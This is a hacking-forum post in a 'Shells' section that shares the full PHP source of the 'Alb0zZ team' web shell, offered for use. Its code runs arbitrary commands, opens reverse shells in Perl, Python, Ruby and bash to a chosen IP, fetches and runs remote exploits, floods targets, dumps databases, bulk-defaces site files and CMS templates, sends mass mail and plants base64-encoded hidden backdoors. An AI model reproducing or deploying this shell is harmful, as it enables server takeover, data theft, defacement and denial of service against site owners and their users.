Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked Alb0zZ team Shell

pinacolada

By INACTIVE pinacolada
in Shells

 Share

Recommended Posts

pinacolada Leech

INACTIVE pinacolada

Posted
Posted

<?php // ================================ // if user is logged in if(isset($_*******['loggedin']) && !empty($_*******['loggedin'])){ // welcome user echo " Server: ".gethostbyname($_SERVER["HTTP_HOST"])." You: ".$_SERVER['REMOTE_ADDR']." Php: ".phpversion()." Apache: ".$_SERVER['SERVER_SOFTWARE']." OS: ".php_uname().""; ?>

<?php if(ini_get('safe_mode') == '1'){ echo ' Safe mode: ON'; } else{ echo ' Safe mode: OFF'; } if(ini_get('magic_quotes_gpc') == '1'){ echo ' Magic_quotes_gpc: ON Turn off'; } else{ echo ' Magic_quotes_gpc: OFF'; } if(function_exists('mysql_connect')){ echo ' Mysql: ON'; } else{ echo ' Mysql: OFF'; } if(function_exists('mssql_connect')){ echo ' Mssql: ON'; } else{ echo ' Mssql: OFF'; } if(function_exists('pg_connect')){ echo ' PostgreSQL: ON'; } else{ echo ' PostgreSQL: OFF'; } if(function_exists('ocilogon')){ echo ' Oracle: ON'; } else{ echo ' Oracle: OFF'; } if(function_exists('curl_version')){ echo ' Curl: ON'; } else{ echo ' Curl: OFF'; } if(function_exists('exec')){ echo ' Exec: ON'; } else{ echo ' Exec: OFF'; } if(!ini_get('open_basedir') != "on"){ echo ' Open_basedir: OFF'; } else{ echo ' Open_basedir: ON'; } if(!ini_get('ini_restore') != "on"){ echo ' Ini_restore: OFF'; } else{ echo ' Ini_restore: ON'; } ?>
<?php echo ' Disable_functions: '; if(ini_get('disable_functions') == ''){ echo ' None'; } else{ echo ''; echo ini_get('disable_functions'); echo ''; } ?>
<?php if(isset($_POST['source']) && isset($_POST['file'])){ $source = $_POST['source']; $file = $_POST['file']; $fp = fopen($file, 'w'); fwrite($fp, $source); fclose($fp); echo '
File saved
'; } if(isset($_GET['turnoff'])){ if(is_writable(".htaccess")){ $value = $_GET['turnoff']; if(file_exists(".htaccess")){ // fread example $handle = fopen(".htaccess", "r"); $contents = ''; while (!feof($handle)) { $read = fread($handle, 8192); $contents = $contents.$read; ?>
Use htaccess to turn php.ini functions on/off
Example: php_value magic_quotes_gpc off
<?php if($value == 'magic_quotes_gpc'){ $data = 'php_value magic_quotes_gpc off '.$contents; echo $data; } else{ echo $contents; } ?>
<?php } fclose($handle); } } if(!file_exists(".htaccess")){ // make htaccess file $myfile = '.htaccess'; $handle = fopen($myfile, 'w') or die('Cannot open file: '.$myfile); fclose($handle); echo '
File created click here
'; } ?> <?php } // make file if(isset($_GET['make'])){ // file maker if(!file_exists($_GET['make'])){ // make htaccess file $myfile = $_GET['make']; $handle = fopen($myfile, 'w') or die('Cannot open file: '.$myfile); fclose($handle); echo '
File created click here
'; } else{ echo '
This file exist.     delete     open
'; } } if(isset($_GET['get'])){ // download $file = $_GET['get']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit(); } } if(isset($_GET['view'])){ $file = $_GET['view']; ?> <?php if(file_exists($file)){ $open = htmlspecialchars(file_get_contents($file)); if($open){ echo $open; } } else{ echo ' FILE DOES NOT EXISTS'; } ?>
Download Delete
<?php } if(isset($_GET['action']) && $_GET['action'] == 'symlink'){ $a = fopen("lolz.pl", "w"); fputs($a, $symlink); fclose($a); system("perl lolz.pl"); } if(isset($_GET['action']) && $_GET['action'] == 'ddos' && empty($_POST['ip'])){ ?>
~
Ddos
~
 TCP UDP
<?php } if(isset($_GET['action']) && $_GET['action'] == 'ddos' && !empty($_POST['ip'])){ $url = $_POST['ip']; if($_POST['way'] == "TCP"){ DDOSTcp($url); } else if($_POST['way'] == "UDP"){ DDOSUdp($url); } else{ echo 'No other methods.'; } } if(isset($_GET['action']) && $_GET['action'] == 'eval'){ ?>
~
Eval
~
 <?php if(isset($_GET['evalit'])){ if(function_exists("system")){ $ev = $_GET['evalit']; echo eval(stripslashes($ev)); } else{ echo 'eval disabled'; } } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'exploit'){ ?>
~
Get and execute
~
 Type: c++ | .cpp python | .py perl | .pl ruby | .rb
<?php } if(isset($_GET['exp_url'])){ echo '
'; if(function_exists("wget")){ wget($_GET['exp_url']); echo $_GET['exp_url'].' got in here'; if(function_exists("system")){ if(isset($_GET['run'])){ $run = $_GET['run']; if($run = 'c++ | .cpp'){ system("gcc -o exploit ".$_GET['exp_url'].";chmod +x exploit;./exploit;"); } if($run = 'perl | .pl'){ } if($run = 'python | .py'){ } if($run = 'ruby | .rb'){ } } } else{ echo 'System command disabled'; } } else{ echo('wget disabled'); } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'bind'){ if(!isset($_POST['port']) && empty($_POST['ip']) && empty($_POST['pyip']) && empty($_POST['rbip'])){ echo "
#1 ./perl
"; echo '


#2 ./bash


#3 ./python


#4 ./ruby linux


#5 ./ruby win
'; } else{ if(isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } "; $fp = fopen("bind.pl", "w"); fwrite($fp, $bind); fclose($fp); exec("perl bind.pl"); } if(isset($_POST['rbip'])){ $ip = $_POST['rbip']; $port = $_POST['rbport']; $ruby = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"; $fp = fopen("bind.rb", "w"); fwrite($fp, $ruby); fclose($fp); exec("ruby bind.rb"); } if(isset($_POST['rbipw'])){ $ip = $_POST['rbipw']; $port = $_POST['rbportw']; $ruby = "ruby -rsocket -e 'c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"; $fp = fopen("bind_win.rb", "w"); fwrite($fp, $ruby); fclose($fp); exec("ruby bind_win.rb"); } if(isset($_POST['pyip'])){ $ip = $_POST['pyip']; $port = $_POST['pyport']; $bind = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"".$ip."\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"; $fp = fopen("bind.py", "w"); fwrite($fp, $bind); fclose($fp); exec("python bind.py"); } if(isset($_POST['ip']) && !empty($_POST['theport'])) { $ip = $_POST['ip']; $port = $_POST['theport']; if(function_exists('exec')){ echo 'Exec command not blocked,,,, continuing'; exec('0<&196;exec 196<>/dev/tcp/.$ip./.$port.; sh <&196 >&196 2>&196'); } else{ echo 'Exec command is blocked blocked by admin'; } } } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'proc'){ ?> <?php echo shell_exec("tasklist")."
"; ?> <?php } if(isset($_GET['action']) && $_GET['action'] == 'mass'){ if(!isset($_GET['code'])){ ?> <?php echo '
Mass deface script, php/html/htm/asp/aspx/js
YOUR DEFACE PAGE HERE =)
Folder:
'; } else{ if (is_dir($_GET['dir'])) { $lolinject = $_GET['code']; foreach (glob($_GET['dir']."/*.php") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.html") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.htm") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.asp") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.js") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } foreach (glob($_GET['dir']."/*.aspx") as $injectj00) { $fp=fopen($injectj00,"a+"); if (fputs($fp,$lolinject)){ echo $injectj00.' was injected
'; } else { echo 'failed to inject '.$injectj00.''; } } } else { //end if inputted dir is real -- if not, show an ugly red error echo ''.$_GET['pathtomass'].' is not available!'; } // end if inputted dir is real, for real this time } } if(isset($_GET['action']) && $_GET['action'] == 'encoders'){ ?>

Enc0d3 ~ D3c0d3

code here
Base64_encode Base64_decode Urlencode Urldecode Hash_md5 Hash_sha1 Hash_sha512
<?php if(isset($_GET['action']) && $_GET['action'] == 'encoders' && !empty($_POST['code']) && !empty($_POST['encoded'])){ $format = $_POST['encoded']; $code = $_POST['code']; if($format == 'Base64_encode'){ echo base64_encode($code); } if($format == 'Base64_decode'){ echo base64_decode($code); } if($format == 'Urlencode'){ echo urlencode($code); } if($format == 'Urldecode'){ echo urldecode($code); } if($format == 'Hash_md5'){ echo md5($code); } if($format == 'Hash_sha1'){ echo sha1($code); } if($format == 'Hash_sha512'){ echo hash('sha512', $code); } } ?> <?php } if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 1){ ?>
host
user
pass
<?php } if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 2){ $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); $query = mysql_query('SHOW DATABASES'); echo '

Database

'; while($rows=mysql_fetch_array($query)){ for($j=0;$j'; } } echo $result; echo '
'; mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 3){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); $db = $_GET['db']; $sql = "SHOW TABLES FROM ".$db; $result = mysql_query($sql); while ($row = mysql_fetch_row($result)) { echo '  '.$row[0].'  '; } mysql_free_result($result); mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 4 && empty($_GET['column']) && !empty($_GET['table'])){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); mysql_select_db($_GET['db']) or die('Unable to select db'); $query = mysql_query("SHOW COLUMNS FROM ".$_GET['table']); while ($row = mysql_fetch_row($query)) { echo '  '.$row[0].'  '; } mysql_free_result($query); mysql_close(); } if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 5 && !empty($_GET['column'])){ $host = $_GET['host']; $user = $_GET['user']; $pass = $_GET['pass']; mysql_connect($host, $user, $pass) or die('Not connected!'); mysql_select_db($_GET['db']) or die('Unable to select db'); $query = mysql_query("SELECT ".$_GET['column']." FROM ".$_GET['table']); echo ""; while($row = mysql_fetch_array($query)){ echo htmlspecialchars($row[$_GET['column']])."\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; } echo "

"; } // tools if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){ if($_POST['SendNowToZoneH']) { echo '
'; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");} elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");} elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");} elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];} ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! "; } echo '
'; } if(isset($_GET['action']) && $_GET['action'] == 'zone-h'){ ?>

Zone-H Defacer
--------SELECT-------- known vulnerability (i.e. unpatched system) undisclosed (new) vulnerability configuration / admin. mistake brute force attack social engineering Web Server intrusion Web Server external module intrusion Mail Server intrusion FTP Server intrusion SSH Server intrusion Telnet Server intrusion RPC Server intrusion Shares misconfiguration Other Server intrusion SQL Injection URL Poisoning File Inclusion Other Web Application bug Remote administrative panel access bruteforcing Remote administrative panel access password guessing Remote administrative panel access social engineering Attack against administrator(password stealing/sniffing) Access credentials through Man In the Middle attack Remote service password guessing Remote service password bruteforce Rerouting after attacking the Firewall Rerouting after attacking the Router DNS attack through social engineering DNS attack through cache poisoning Not available --------SELECT-------- Heh...just for fun! Revenge against that website Political reasons As a challenge I just want to be the best defacer Patriotism Not available
List Of Domains
<?php } if(isset($_GET['action']) && $_GET['action'] == 'tools'){ ?>

Cloudflare

Ip finder ./x-h4ck

CMS Fack

wp/mybb/vb
Some deface shit in here :P





wpmybbvb
vb = update faq, calendar, search
wp = update wordpress posts
mybb = update mybb index

<?php if(isset($_GET['folder'])){ $chemin=$_GET['folder']; $files = glob("$chemin*"); echo "Trying To List Folder $chemin
"; foreach ($files as $filename) { echo "
";    echo "$filename\n";    echo "
"; } } else{ ?>

List Directory

<?php } if(isset($_GET['hex'])){ echo '

0x'.bin2hex($_GET['hex']).''; } else{ ?>

Text 2 Hex

<?php } ?> <?php if(isset($_GET['lfi'])){ include($_GET['lfi']); } else{ ?>

LFI Dude

<?php } ?>

Mail sender

Subject:

From:

To:

Body:
We made some changes recent days and..
Times:
<?php if(isset($_GET['cook'])){ $a = fopen("oncha.php", "w"); fputs($a, $o); fclose($a); } if(isset($_GET['s-option'])){ $op = $_GET['s-option']; if($op == ".htaccess"){ $o = stripslashes(base64_decode("IyBPdmVycmlkZSBkZWZhdWx0IGRlbnkgcnVsZSB0byBtYWtlIC5odGFjY2VzcyBmaWxlIGFjY2Vzc2libGUgb3ZlciB3ZWINCjxGaWxlcyB+IFwiXlxcLmh0XCI+DQpPcmRlciBhbGxvdyxkZW55DQpBbGxvdyBmcm9tIGFsbA0KPC9GaWxlcz4NCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAgLmh0YWNjZXNzDQoNCiMjIyMjIyBTSEVMTCAjIyMjIyMgPD9waHAgZWNobyBcIlxcblwiO3Bhc3N0aHJ1KCRfR0VUW1wnY1wnXS5cIiAyPiYxXCIpOyA/PiMjIyMjIyBMTEVIUyAjIyMjIyM=")); $a = fopen(".htaccess", "w"); fputs($a, $o); fclose($a); echo 'Visit '.$_SERVER['HTTP_HOST'].'/.htaccess?c='; } else{ $o = stripslashes(base64_decode("PD9waHAgc3lzdGVtKCRfR0VUW1wnY1wnXSk7ID8+")); $a = fopen("dfgdfg.php", "w"); fputs($a, $o); fclose($a); echo 'Visit '.$_SERVER['HTTP_HOST'].'/dfgdfg.php?c='; } } else{ ?>

Hide Shell

.htaccess .php
<?php } if(isset($_GET['fp'])){ $filepath = $_GET['fp']; $sitepath = $_GET['sp']; $writeblefilepath = 'myfile.txt'; $flib=$sitepath.$writeblefilepath; @unlink($flib); symlink($filepath, $flib); echo readlink($flib)."\n"; echo "".file_get_contents("http://".$_SERVER['HTTP_HOST']."/".$writeblefilepath).""; @unlink($flib); } else{ ?>

Symlink #2

__First tool
File path:

Site path:


<?php } ?>
<?php if(isset($_POST['site'])){ /* FAK CLOUDFLARE, pirate.al, flashcrew.in, devilzc0de.org h4x0rs.net */ $fuckcloud = dns_get_record($_POST['site'], DNS_TXT); print_r($fuckcloud); } if(isset($_POST['subjekti'])){ $subject = $_POST['subjekti']; $email = $_POST['email']; $to = $_POST['to']; $comments = $_POST['arsyeja']; $times = $_POST['times']; for($i=0;$i<$times;$i++){ if(mail("$to", "$subject", "$comments", "From: $email")){ echo " Sent."; } else{ echo " Not sent!"; }}} if(isset($_POST['index'])){ $index = mysql_real_escape_string($_POST['index']); $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $tab = $_POST['tab']; mysql_connect($host, $user, $pass); mysql_select_db($db); $cat = $_POST['cat']; if($cat == 'wp'){ mysql_query("UPDATE ".$tab."posts SET post_title='".$index."'"); echo 'All posts updated :)'; } if($cat == 'mybb'){ mysql_query("UPDATE ".$tab."templates SET template='".$index."'"); echo 'Index f@cked :)'; } if($cat == 'vb'){ mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='faq'"); echo 'faq f@cked :)'; mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='calendar'"); echo 'calendar f@cked :)'; mysql_query("UPDATE ".$tab."template SET template ='".$index."' WHERE title ='search'"); echo 'search f@cked :)'; } } echo ''; } ?> <?php if(isset($_GET['action']) && $_GET['action'] == 'files'){ ?>

    Change directory              
    Make directory                
<?php // delete if(isset($_GET['delete']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $file = $_GET['delete']; // if exist if(is_dir($file) || file_exists($file)){ // if file del if(!is_dir($file)){ unlink($file); echo 'File deleted
'; } if(is_dir($file)){ function rmdirs($d) { $f = glob($d . '*', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } rmdirs($file); echo 'Folder deleted
'; } } else{ echo 'File or folder does not exist
'; } } // rename if(isset($_GET['old_name']) && !empty($_GET['rename_file']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $old = $_GET['old_name']; $new = $_GET['rename_file']; // if new file or folder exist if(is_dir($new) || file_exists($new)){ echo '    File or folder exists. delete
'; } else{ // if file or folder exist if(is_dir($old) || file_exists($old)){ if(rename($old, $new)){ if(is_dir($old)){ echo "Folder renamed sucsessfuly to ".$new.", open
"; } if(!is_dir($old)){ echo "File renamed sucsessfuly to ".$new.", open
"; } } else{ echo "Problem renaming ".$old."
"; } } else{ echo '    File or folder not found.
'; } } } if(isset($_GET['rename']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $file = $_GET['rename']; ?> Old Name:
Rename to:
<?php } // new dir if(isset($_GET['go']) && !empty($_GET['newdir']) && !empty($_GET['action']) && $_GET['action'] == 'files'){ $dir = $_GET['go']; $new = $_GET['newdir']; $currect = getcwd(); // if dir is dir if(is_dir($dir)){ // if dir exist if(is_dir($new)){ echo '    Directory exist. delete
'; } else{ if(mkdir($new)){ echo '    Directory created
'; } else{ echo '    Problem creating directory
'; } if(!is_dir($dir)){ chdir($go); if(mkdir($new)){ echo '    Directory created
'; } else{ echo '    Problem creating directory
'; } } } } } // file browser $self = $_SERVER['PHP_SELF']; $dir = getcwd(); if(isset($_GET['go'])) { $dir = $_GET['go']; } if(is_dir($dir)) { $handle = opendir($dir); { showDrives(); ?>
    «back         forward  »
<?php if($dir[(strlen($dir)-1)] != '/'){$dir = $dir.'/';} while (($file = readdir($handle)) != false) { if ($file != "." && $file != "..") { $color = 'red'; if(is_readable($dir.$file)) { $color = 'yellow'; } if(is_writable($dir.$file)) { $color = '#00ff00'; } if(is_dir($dir.$file)) { ?> [ <?php echo $file ?> ] <?php echo HumanReadableFilesize(dirSize($dir.$file));?> <?php echo getFilePermissions($dir.$file);?> > <?php echo getperms($dir); ?> Delete Rename Download Upload
 <?php } //Its a file else { ?> ;" href='<?php echo $self ?>?view=<?php echo $dir.$file ?>'><?php echo $file ?> <?php echo HumanReadableFilesize(filesize($dir.$file));?> <?php echo getFilePermissions($dir.$file);?> > <?php echo getperms($dir.$file); ?> Delete Rename Download
 <?php } } } closedir($handle); } } else { echo "

Permission Denied

"; } ?>
<?php } ?>

<?php if(!isset($_GET['action']) && !isset($_GET['upload']) && !isset($_GET['get']) && !isset($_GET['turnoff']) && !isset($_GET['view']) && !isset($_GET['db'])){ ?>
Execute command
Ready commands whoami netstat -an ls -la ls uname -a dir start cmd.exe cat /etc/passwd cat /etc/hosts
Create file            
Chmod file             ~~~~ chmod chown chgrp
Passthru               
Exec                     
Popen                   
<?php } if(isset($_GET['thepass'])){ echo ''; passthru($_GET['thepass']); echo ''; } if(isset($_GET['theexec'])){ echo ''; if(!function_exists('exec')){ die('Exec command is blocked blocked by admin'); } else{ echo exec($_GET['theexec']); echo ''; } } if(isset($_GET['popen'])){ echo ''; if(!function_exists('popen')){ die('Popen command is blocked blocked by admin'); } else{ popen($_GET['popen'], "r"); echo ''; } } if(isset($_GET['thefile'])){ $file = $_GET['thefile']; $new = $_GET['thefileval']; if($_GET['comm'] == 'chmod') { $ch_ok = chmod($file,$new); echo "Permission Changed."; } else if($_GET['comm'] == 'chown') { $ch_ok = chown($file,$new); echo "Owner Changed."; } else if($_GET['comm'] == 'chgrp') { $ch_ok = chgrp($file,$new); echo "Group Changed."; } } if(isset($_FILES['upload'])){ //file upload echo '
'; if(isset($_POST['location']) && !empty($_POST['location'])){ $target_path = $_POST['location']; $target_path = $target_path.'/'; } else{ $target_path = ""; } echo "File ".basename($_FILES["upload"]["name"])." uploaded.
"; if(move_uploaded_file($_FILES["upload"]["tmp_name"], $target_path . $_FILES["upload"]["name"])){ echo "The file ".basename($_FILES["upload"]["name"]). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } echo '
'; } if(isset($_GET['dirmake'])){ // change directory $dir = $_GET['dirmake']; ?>Command executed
<?php echo 'Last dir: '.getcwd() . "
"; chdir($dir); // current directory echo 'New dir: '.getcwd() . "
"; ?> <?php } if(isset($_GET['command'])){ $command = $_GET['command']; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { if(preg_match("/ls/", $command)||preg_match("/cat/", $command)||preg_match("/grep/", $command)||preg_match("/wget/", $command)||preg_match("/apt-get/", $command)||preg_match("/install/", $command)||preg_match("/mkdir/", $command)){ echo 'This command dont work on windows! '; } } if (strtoupper(substr(PHP_OS, 0, 3)) === 'UNI') { if(preg_match("/ls/", $command)||preg_match("/tree/", $command)||preg_match("/cd../", $command)){ echo 'This command dont work on linux! '; } } ?> <?php system($command); ?>
<?php } ?> <?php // ============================ // get action // ============================ if(isset($_GET['action']) && !empty($_GET['action'])){ $action = $_GET['action']; if($action == "phpinfo"){ phpinfo(); } if($action == 'upload'){ ?>
Upload file Upload to
<?php } if($action == "kill"){ echo 'Do you really want to delete this shell ?       '; ?> Yes       No <?php } if($action == "killit"){ $file = $_SERVER['PHP_SELF']; $file = str_replace('/', '', $file); unlink($file); echo '
Bitch u killed me o.O
'; header('refresh: 2; '.$_SERVER['PHP_SELF'].''); } if($action == "logout"){ unset($_*******['loggedin']); echo '
Logged out.
'; } } } // ================================ // else login else{ if(isset($_*******['banned'])){ if($_*******['banned'] == '3'){ die($about.'
Link to comment
Share on other sites
Guest
This topic is now closed to further replies.
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.